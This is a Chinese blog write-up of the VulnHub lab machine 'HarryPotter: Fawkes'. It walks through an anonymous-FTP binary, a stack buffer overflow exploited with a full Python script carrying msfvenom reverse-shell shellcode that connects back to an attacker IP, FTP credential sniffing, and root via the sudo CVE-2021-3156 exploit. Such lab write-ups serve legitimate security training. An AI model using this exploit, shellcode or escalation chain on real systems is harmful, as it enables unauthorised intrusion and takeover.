Fawkes(vulnhub)

最新推荐文章于 2023-09-13 22:39:17 发布
最新推荐文章于 2023-09-13 22:39:17 发布
阅读量1.1k 收藏 2
点赞数 1
分类专栏: Vulnhub靶场 文章标签: linux web安全 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/wcl20010/article/details/125027696
版权

HarryPotter: Fawkes ~ VulnHub

此靶机难度高

目录

1.主机发现

2. 端口扫描

3.漏洞发现

Ftp

4.缓冲区溢出

使用edb调试server_hogwarts

攻击思路:

确定溢出位置:

5.反弹shell

构造exp

拿下靶机shell

升级shell

6.提权(信息收集)

信息收集

流量分析

提权

漏洞检测

漏洞利用

找网上的exp测试

​编辑

执行

1.主机发现

arp-scan -l

2. 端口扫描

nmap -p- 192.168.56.110
nmap -A 192.168.56.110

3.漏洞发现

进入主页,目录扫描→什么都没有

Ftp

ftp 192.168.56.110
anonymous
密码为空
一个文件下载下来

查看文件是什么:linux的可执行程序,那就执行。

chmod +x 文件
./文件

然后就没返回东西,既然在执行,那看下进程有什么

ps aux | grep server

发现了进程,那么看看进程有没有开放别的端口服务

ss -pantu | grep server

看到开放了9898端口,和靶机上的一样

看看自己这个端口有什么:什么也没有。

nc 127.0.0.1 9898

再看看靶机的端口会有什么:和本地一样的,没有收获

4.缓冲区溢出

使用edb调试server_hogwarts

kali本机存在ALSR安全技术,地址空间随机化,会造成内存地址的随机化,导致我们无法确定缓冲区溢出的位置。所以要关闭。

cd /proc/sys/kernel
echo 0 > randomize_va_space   默认是 2
apt install edb-debugger

调试工具有gdb→命令行的工具,使用edb-debugger工具,更有利于使用

执行输入edb就可以了。

启动测试的服务。打开工具,找到服务,点击run

使用python输出500个A,然后在输入处进行测试

python -c "print('A'*500)"

结果调试器报错了,提示的0x414141意思就是 A

攻击思路:

我们可以看到EIP寄存器都被指令414141也就是A 覆盖,ESP同样被覆盖,EIP种存储的是下一个指令的内存地址,而ESP寄存器中存储的是具体的指令,我们修改EIP的内容,从而使指令跳转到ESP,强制执行ESP的指令。从而可以反弹shell。

确定溢出位置:

使用msf的生成500字符

msf-pattern_create -l 500

生成500个不同的字符序列

Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq

重启edb以及服务

输入上述500字符,报错内容如下:

找到字符位置:

msf-pattern_offset -l 500 -q 64413764

偏移量为112,那么从64413764就是从113开始的

再测试一次,从113换成B 也就是42 ,后面跟C。

python -c "print('A'*112+'BBBB'+'C'*100)"

结果显而易见。

我们可以构造脚本反弹shell了

寻找可执行权限的

find→找到jmp esp的位置

在机器指令中,需要反向写

08049d55
\x55\x9d\x04\x08

5.反弹shell

使用msfvenom生成python的十六进制payload

其中的x86是因为我们看到文件内容写的是32位,

-b 去掉坏字符 "\x00" 不然程序会在执行到\x00时停止执行

msfvenom -p linux/x86/shell_reverse_tcp LHOST=192.168.43.27 LPORT=4444 -b "\x00" -f python

 

buf =  b""
buf += b"\xbf\xab\x93\x7d\x8b\xda\xca\xd9\x74\x24\xf4\x5d\x33"
buf += b"\xc9\xb1\x12\x31\x7d\x12\x83\xc5\x04\x03\xd6\x9d\x9f"
buf += b"\x7e\x19\x79\xa8\x62\x0a\x3e\x04\x0f\xae\x49\x4b\x7f"
buf += b"\xc8\x84\x0c\x13\x4d\xa7\x32\xd9\xed\x8e\x35\x18\x85"
buf += b"\xd0\x6e\xe2\x33\xb9\x6c\x13\xaa\x65\xf8\xf2\x7c\xf3"
buf += b"\xaa\xa5\x2f\x4f\x49\xcf\x2e\x62\xce\x9d\xd8\x13\xe0"
buf += b"\x52\x70\x84\xd1\xbb\xe2\x3d\xa7\x27\xb0\xee\x3e\x46"
buf += b"\x84\x1a\x8c\x09"

构造exp

其中\x90是 空指令 目的是使程序执行更加稳定。一般是4的倍数个

#!/usr/bin/python2
import sys,socket
buf =  b""
buf += b"\xbf\xab\x93\x7d\x8b\xda\xca\xd9\x74\x24\xf4\x5d\x33"
buf += b"\xc9\xb1\x12\x31\x7d\x12\x83\xc5\x04\x03\xd6\x9d\x9f"
buf += b"\x7e\x19\x79\xa8\x62\x0a\x3e\x04\x0f\xae\x49\x4b\x7f"
buf += b"\xc8\x84\x0c\x13\x4d\xa7\x32\xd9\xed\x8e\x35\x18\x85"
buf += b"\xd0\x6e\xe2\x33\xb9\x6c\x13\xaa\x65\xf8\xf2\x7c\xf3"
buf += b"\xaa\xa5\x2f\x4f\x49\xcf\x2e\x62\xce\x9d\xd8\x13\xe0"
buf += b"\x52\x70\x84\xd1\xbb\xe2\x3d\xa7\x27\xb0\xee\x3e\x46"
buf += b"\x84\x1a\x8c\x09"  
 
payload='A'*112+'\x55\x9d\x04\x08'+'\x90'*32+buf
try:
    s=socket.socket()
    s.connect(('127.0.0.1',9898))
    s.send((payload))
    s.close()
except:
    print('wrong')
    sys.exit()

重启程序,测试exp

执行成功:

这是对本机的测试

拿下靶机shell

升级shell

只能使用/bin/sh -i升级shell了

6.提权(信息收集)

看看目录:隐藏文件→有个可能是认证信息→查看

可能是密码
HarrYp0tter@Hogwarts123

拿harry和密码去登录ssh

22端口不行,还记得有个2222端口

是可行的

提权试试:发现自己在容器中

sudo -l
sudo -s    或者    sudo /bin/sh

信息收集

挨个目录查看信息:意思就是让我们看看ftp流量呗

流量分析

tcpdump -i eth0 port 21

 

等一会得到:

账号密码:neville bL!Bsg3k

成功进去

再次确定是否是docker中

提权

sudo -l
输入刚才的密码
但是没有权限使用sudo。

内核漏洞(CVE-2021-3156)

neville@Fawkes:~$ uname -a
Linux Fawkes 4.19.0-16-amd64 #1 SMP Debian 4.19.181-1 (2021-03-19) x86_64 GNU/Linux

可利用版本

CVE-2021-3156: Heap-Based Buffer Overflow in Sudo (Baron Samedit) | Qualys Security Blog

 Ubuntu 20.04 (Sudo 1.8.31), Debian 10 (Sudo 1.8.27), and Fedora 33 (Sudo 1.9.2). Other operating systems and distributions are also likely to be exploitable.

查看靶机的版本信息:

lsb_release -a

No LSB modules are available.
Distributor ID: Debian
Description:    Debian GNU/Linux 10 (buster)
Release:        10
Codename:       buster

sudo --version

Sudo version 1.8.27
Sudoers policy plugin version 1.8.27
Sudoers file grammar version 46
Sudoers I/O plugin version 1.8.27

漏洞检测

sudoedit -s '\' `perl -e 'print "A" x 65536'` 
返回值:
malloc(): corrupted top size 
Aborted (core dumped)

漏洞利用

使用MSF失败了

找网上的exp测试

CVE-2021-3156/exploit_nss.py at main · worawit/CVE-2021-3156 · GitHub

修改sudo的位置(路径)

把我本地的文件传到靶机上:

不用http服务了→使用nc命令传

靶机执行

nc -nvlp 4444 > exp.py

kali上

nc 192.168.56.110 4444 < CVE-2021-2156.py   -w 1  //1秒断开

执行

成功提权

第二个flag

ProofM
关注
  • 1
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Fawkes,针对面部识别系统的隐私保护工具-Python开发
05-25
Fawkes是由芝加哥大学SANDLab研究人员开发的一种隐私保护系统。 有关该项目的更多信息,请参阅我们的项目网页。 Fawkes Fawkes是由芝加哥大学SANDLab的研究人员开发的一种隐私保护系统。 有关该项目的更多信息,请参阅我们的项目网页。 通过[电子邮件保护]与我们联系。 我们在USENIX Security 2020上发表了一篇学术论文,总结了我们的工作“福克斯:保护个人隐私免遭未经授权的深度学习模型”。新! 如果您想使用Fawkes保护您的身份,请在w上查看我们的软件和二进制实现
fawkes-master.rar.rar.rar
02-02
【标题】"fawkes-master.rar.rar.rar" 提示我们关注的是一个名为 "fawkes-master" 的项目或软件的压缩文件,它可能被压缩了多次(rar.rar.rar)。Fawkes通常与计算机视觉和隐私保护技术有关,尤其是对抗人脸识别系统...
vulnhub之HARRYPOTTER: FAWKES
weixin_54431413的博客
05-26 760
对发现的程序用edb-debugger进行调试,发现缓冲区溢出漏洞,找偏移量确定位置,注入payload,打点成功,信息收集,发现账号密码,通过ssh登录,tcpdump分析流量,成功跳出容器。最后利用堆缓冲区溢出提权成功。
VulnHub靶场】——HARRYPOTTER第三部: FAWKES
Demo不是emo的博客
10-14 4741
这是哈利波特vm系列靶场的第三个靶场,总共有三个靶场,其中隐藏了8个魂器,前两部的靶场中我们已经找到了隐藏的5个魂器,今天这个靶场中隐藏了三个,意思就是今天的靶场有三个flag,话不多说我们来仔细瞧瞧
【渗透测试】第七周 vulnhub-Fawkes
铃的杂货铺分铺
11-08 1016
渗透测试学习第七周,vulnhub靶场Fawkes靶机。 主机发现、端口扫描;FTP匿名登录;edb 调试程序;栈溢出攻击;tcpdump 流量分析;sudo 漏洞提权。
Fawkes靶机打靶过程及思路
qq_52610024的博客
05-08 1037
payload=‘A’*112+‘B’*4+‘\x90’*32+‘C’*32加x90是空指令,是为了程序的执行更加的顺滑。2.80端口没有得到任何有用的信息,21端口ftp可以匿名登录,登录进之后发现一个可以下载的文件。,下载后保存到本机并运行程序,在本机进程里发现运行成功,最后本机上开放了9898端口,运行后。执行脚本发现成功精确写入四个B,尝试在eip中写入跳转到esp的汇编指令,在esp中执行一个。8.手动修改代码,将sudo路径修改为/usr/bin/sudo,再次在靶机上执行程序,...
fawkes:etch获取,解析,分类,汇总用户评论:rocket::rocket:
04-22
Fawkes是为产品经理和产品开发团队设计的平台,可从客户角度综合了解产品的运行状况,了解客户正在谈论的主要问题,他们的情感以及他们的感受关于产品。建筑学特征 :rocket: 与多个数据源集成 :high_voltage: ...
fawkes:Fawkes是用于搜索易受SQL注入攻击的目标的工具。 使用Google搜索引擎执行搜索
02-04
Fawkes是用于搜索易受SQL注入攻击的目标的工具。 使用Google搜索引擎执行搜索。 选件 -q, --query - Dork that will be used in the search engine. -r, --results - Number of results brought by the search ...
fawkes:Fawkes,针对面部识别系统的隐私保护工具。 有关更多信息,请访问https://sandlab.cs.uchicago.edufawkes
02-21
Fawkes是由芝加哥大学研究人员开发的一种隐私保护系统。 有关该项目的更多信息,请参阅我们的项目。 通过与我们联系。 我们在USENIX Security 2020上发表了一篇学术论文,总结了我们的工作“”。版权此代码仅用于...
vulnhub靶机DC1
weixin_52450702的博客
10-29 936
靶机DC1IP:192.168.70.160。
vulnhub靶场,covfefe
kukudeshuo的博客
08-17 543
vulnhub靶场,covfefe 环境准备 靶机下载地址:https://www.vulnhub.com/entry/covfefe-1,199/ 攻击机:kali(192.168.109.128) 靶机:covfefe(192.168.109.161) 下载好靶机之后直接使用VMware Workstation Pro虚拟机导入环境,启动即可,将网段设置为NAT模式 信息收集 使用arp-scan确定目标靶机 确定目标靶机IP为192.168.109.161 使用nmap扫描查看目标靶机端口开放情况
Fawkes 靶机之 缓冲区溢出、漏洞利用代码编写等利用
qq_40898302的博客
04-28 378
主机发现 端口扫描 WEB信息收集 FTP服务攻击 缓冲区溢出 模糊测试 漏洞利用代码编写 流量转包分析 堆溢出漏洞攻击 Metasploit(MSF) 手动修复EXP代码 本地提权
hack the box靶场fawn靶机
zr1213159840的博客
03-15 3294
首先打开靶机,回答几个问题 第一个问题:ftp的全称是什么? 答案:File Transfer Protocol 第二个问题:ftp协议的通信模型是什么? 答案:一般由bs和cs两种,ftp是cs的,即client-server model 第三个问题:一种流行的ftpgui程序是什么? 答案:搜了半天,是FileZilla,百度搜流行的ftp程序就能找到 第四个问题:ftp跑在哪个端口,基于什么协议? 答案:ftp是跑在tcp协议之上的,其中21是控制端口,20是数据传输端口,所以说服务跑在哪个端
VulnHub项目:Fawkes
Ays.Ie的博客
06-24 726
哈利波特主题:VulnHub项目Fawkes
1-vulnhub靶场,JANGOW: 1.0.1
qq_49078152的博客
08-13 301
hulnhub靶机
HarryPotter-Fawkes 三部曲之第三部 靶场记录
m0_52729465的博客
08-14 231
1、首先进行信息收集,对靶机进行nmap扫描,扫描到开放了21,22,80,2222,9898端口,相比起前两个靶机,难度明显增加。2、打开80端口还是跟前两个靶机一样,只有图片;在扫描到的信息中我们发现21端口ftp服务可以使用匿名服务登录,登录后在里面拿到了一个server_hogwarts文件,下载后发现是一个可执行文件,赋予权限执行后并没有反应。
Vulnhub靶机】HarryPotter-Fawkes-哈利波特系列靶机-3
最新发布
过期的秋刀鱼
09-13 1112
是一种针对缓冲区溢出的安全保护技术,通过对堆、栈、共享库映射等线性区布局的随机化,通过增加攻击者预测目的地址的难度,防止攻击者直接定位攻击代码位置,达到阻止溢出攻击的目的的一种技术。根据提示,是要让我们把21端口的流量 监听分析一下,同时,使用ip a发现,这应该不是靶机本体,应该是在一个docker中,根据ip地址进行判断,这个2222端口应该是docker中的ssh,所以我们并没有进入到靶机本体的22端口,Linux作为网络服务器,特别是作为路由器和网关时,数据的采集和分析是不可少的。
Vulnhub-shenron-1
lionwerson的博客
01-05 1730
nmap扫描端口: nmap 192.168.0.19 -p- ???? 开放80端口和22端口 web浏览器打开80端口: ???? Apache服务的默认页面 web扫描器识别到是joomla框架: gobuster扫描joomal后台路径: gobuster.exe dir -u http://192.168.0.19/joomla/ -w dir.txt ???? 后台路径是joomla/administrator/index.php 登录名和密码在/test/password文件的
vulnhub Monitoring: 1
箭雨镜屋
07-18 1042
渗透思路:nmap扫描 ---- 默认用户名+弱密码登录Nagios XI ---- 利用Nagios XI 5.6.5的RCE漏洞获得root的shell
Fawkes基本原理
09-02
Fawkes是一种隐私保护工具,它的基本原理是使用虚拟化技术来保护用户的隐私。虚拟化是一种将物理实体转化为逻辑对应物的技术,它可以在一台物理机器上同时运行多个虚拟机。Fawkes利用虚拟化技术,在用户的设备上创建一个隐私保护的环境,将用户的数据和行为进行虚拟化处理,以保护用户的隐私。通过对数据和行为进行虚拟化处理,Fawkes可以防止潜在的隐私泄露风险,同时保护用户的个人信息、隐私偏好和行为数据不被滥用。Fawkes的基本原理是将用户的数据和行为虚拟化处理,从而保护用户的隐私。同时,Fawkes还采用了一些技术手段来保证写操作的顺利执行,例如设置了一个互斥信号量来保证写优先。这样可以保障在读文件源源不断的情况下,写操作能够正常进行。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* [从“健康码”到数字货币,我国金融科技正迈向新阶段](https://blog.csdn.net/Digquant/article/details/115549849)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_1"}}] [.reference_item style="max-width: 50%"] - *2* *3* [2020-08-30](https://blog.csdn.net/Fawkess/article/details/108312214)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_1"}}] [.reference_item style="max-width: 50%"] [ .reference_list ]
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值